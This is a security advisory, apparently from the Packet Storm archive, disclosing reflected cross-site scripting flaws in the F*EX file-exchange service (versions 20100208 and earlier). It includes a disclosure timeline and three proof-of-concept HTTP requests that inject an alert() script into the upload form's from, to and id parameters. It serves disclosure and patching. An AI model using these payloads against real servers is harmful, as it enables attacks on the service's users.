what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

F*EX 20100208 Cross Site Scripting

F*EX 20100208 Cross Site Scripting
Posted Feb 20, 2012
Authored by muuratsalo

F*EX (Frams's Fast File EXchange) versions 20100208 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | e3ed0a0621b24125c69ddce3a7b05238d8dc1314fb2956b7a0d361bd056e388d

F*EX 20100208 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
F*EX <= 20100208 Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------


title.............: F*EX <= 20100208 Cross Site Scripting Vulnerabilities
author............: muuratsalo
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian 6.0.4 (squeeze) - package fex_20100208+debian1-1+squeeze1_all.deb


========================================================================

muuratsalo | muuratsalo experimental hack lab is a proud member of the Revshell.com community

========================================================================

[0x01] Software overview

F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.

========================================================================

[0x02] Vulnerabilities overview

F*EX <= 20100208 suffers from multiple Cross Site Scripting attacks (Reflected) in the WWW upload form.

========================================================================

[0x03] Disclosure timeline

[2012-02-01] - Multiple vulnerabilities discovered and reported to the author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-20] - Public disclosure

========================================================================

[0x04] Vulnerabilities

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [from parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"


----------1922591683
Content-Disposition: form-data; name="from"

38c66<script>alert(1)</script>b08f61c45c6
----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [to parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"

38c66<script>alert(1)</script>b08f61c45c6

----------1922591683
Content-Disposition: form-data; name="from"

----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id parameter] ***

GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1

------------------------------------------------------------------------
------------------------------------------------------------------------



Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close